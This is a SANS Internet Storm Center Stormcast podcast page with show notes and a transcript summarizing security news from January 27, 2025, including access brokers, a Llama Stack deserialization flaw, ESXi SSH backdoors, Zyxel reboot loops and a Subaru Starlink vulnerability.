Handler on Duty: Didier Stevens
Threat Level: green
Podcast Detail
SANS ISC Stormcast, Jan 27, 2025: Access Brokers; Llama Stack Vuln; ESXi SSH Tunnels; Zyxel Boot Loops; Subary StarLeak
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9296.mp3
Access Brokers; Llama Stack Vuln; ESXi SSH Tunnels; Zyxel Boot Loops; Subary StarLeak
00:00
My Next Class
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
Guest Diary: How Access Brokers Maintain Persistence
Explore how cybercriminals utilize access brokers to persist within networks and the impact this has on organizational security.
https://isc.sans.edu/forums/diary/Guest+Diary+How+Access+Brokers+Maintain+Persistence/31600/
Critical Vulnerability in Meta's Llama Stack (CVE-2024-50050)
A deep dive into CVE-2024-50050, a critical vulnerability affecting Meta's Llama Stack, with exploitation details and mitigation strategies.
https://www.oligo.security/blog/cve-2024-50050-critical-vulnerability-in-meta-llama-llama-stack
ESXi Ransomware and SSH Tunneling Defense Strategies
Learn how to fortify your infrastructure against ransomware targeting ESXi environments, focusing on SSH tunneling and proactive measures.
https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/
Zyxel USG FLEX/ATP Series Application Signature Recovery Steps
Addressing issues with Zyxel’s USG FLEX/ATP Series application signatures as of January 24, 2025, with a detailed recovery guide.
https://support.zyxel.eu/hc/en-us/articles/24159250192658-USG-FLEX-ATP-Series-Recovery-Steps-for-Application-Signature-Issue-on-January-24th-2025
Subaru Starlink Vulnerability Exposed Cars to Remote Hacking
Discussing how a vulnerability in Subaru’s Starlink system left vehicles susceptible to remote exploitation and the steps taken to resolve it.
https://www.securityweek.com/subaru-starlink-vulnerability-exposed-cars-to-remote-hacking/
iTunes
MP3 Download
RSS Feed
Google
Podbean
Amazon Echo
YouTube
Spreaker
Spotify
Discussion
New Discussions closed for all Podcasts older than two(2) weeks
Please send your comments to our Contact Form
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
| Network Monitoring and Threat Detection In-Depth | Baltimore | Jun 2nd - Jun 7th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 14th - Jul 19th 2025 |
Podcast Transcript
Hello and welcome to the Monday, January 27th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida. At the Internet Storm Center we had another diary created by one of our undergraduate interns. This time it was Joseph Flint writing about how access brokers are maintaining persistence. Access brokers are just breaking the system and then selling access to these systems to others like for example ransomware actors or really whoever sort of needs a botnet for whatever. So it's really the initial phase of sort of your malware economy. One example that Joseph is pointing out here is SystemBC. That's a botnet that's often associated with these access brokers and well how it reflects itself in our honeypots. Some of the specific URLs related to SystemBC that people are scanning for. But then also how to prevent infection and how to detect infection. Which should not really be all that difficult. There are plenty of intrusion detection rules out there as Joseph points out. As well as of course usually these access brokers are using fairly low level and easy vulnerabilities. They're often using weak passwords, well -known web application vulnerabilities. So some basic system hardening and of course patching keeping your system up to date goes a long way to prevent these initial infections. And everything related to AI of course is still getting a lot of news. Should get a lot of news given the rapid adoption of AI tools everywhere. One way how you adopt these AI tools is well by using various frameworks to create applications around this. One example here is Meta-llama or the LLama stack. Of this. One example here is Meta-Llama or the Llama stack. Of course that comes from Meta who is behind the Llama AI model. Fairly popular model to include in your applications. The Meta-Llama part of this stack has a deserialization vulnerability that does allow the execution of arbitrary code. So if you're writing tools for these fancy new AI models. Please don't forget good old vulnerabilities like deserialization in particular. Since these tools often have to deal with large amounts of unstructured input. Which of course tends to be quite difficult to validate. Well as so often we have a little bit of controversy here around the severity of this vulnerability. Snyk rates it as a 9.3 so critical. While Meta only rates it as a 6.3 or medium. I think it really depends on how you're using these components. So definitely look at the vulnerability. See how it would possibly affect your software. Sygnia wrote up a blog post with some of their observations. From recent attacks against VMware ESXi. VMware has been a huge target in particular for ransomware gangs. Of course if you are able to access Hypervisor. You often essentially own the entire enterprise. Well what the blog post here by Signia is focusing on. Is the SSH backdoor being deployed by some of these ransomware gangs. Definitely worthwhile reading this. Just to look for indicators of compromise. And any sort of techniques that you should be looking for here. Just actually had last week a student with a research paper. That is looking into some of the detection of odd SSH traffic like this. Hope to get them on the podcast in the future. But either way pay attention to SSH connections. And this is certainly a good read if you're using VMware ESXi. And if you're worried about ransomware actors taking it over. Which is definitely something that you should be worried about. And if you are using a Zyxel firewall. Particularly the USG Flex and ATP series. You may be affected by a bad signature update. That causes these devices to get stuck in a reboot loop. In the show notes I'll link to the advisory. The sad part here is the only way you're going to recover the device. Is via a serial console cable. Which of course typically then requires on -site access. And then a couple listeners asked about the Subaru Starlink vulnerability. Haven't really covered it much. In part because the real vulnerability here. Is just a relatively straightforward password reset vulnerability. In their web portal. That then allows you to reset passwords. Meaning then access the account where you reset the password for. This is sort of a not very spectacular web application vulnerability. The real problem here is the amount of access you're getting to vehicle data. Apparently anyone with admin privileges to this application. Will have access to at least a year's worth of location data. And the like for the vehicles. So the problem here I think is more how much data is being collected. Versus the actual vulnerability. And just a little side note. Starlink just happens to be the name of this particular infotainment system. Not related to the satellite service provider. Starlink. Starlink. Well and this is it for today. Thanks for listening. And talk to you again tomorrow. Bye.
Follow updates by subscribing to the handler's diary RSS feed
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 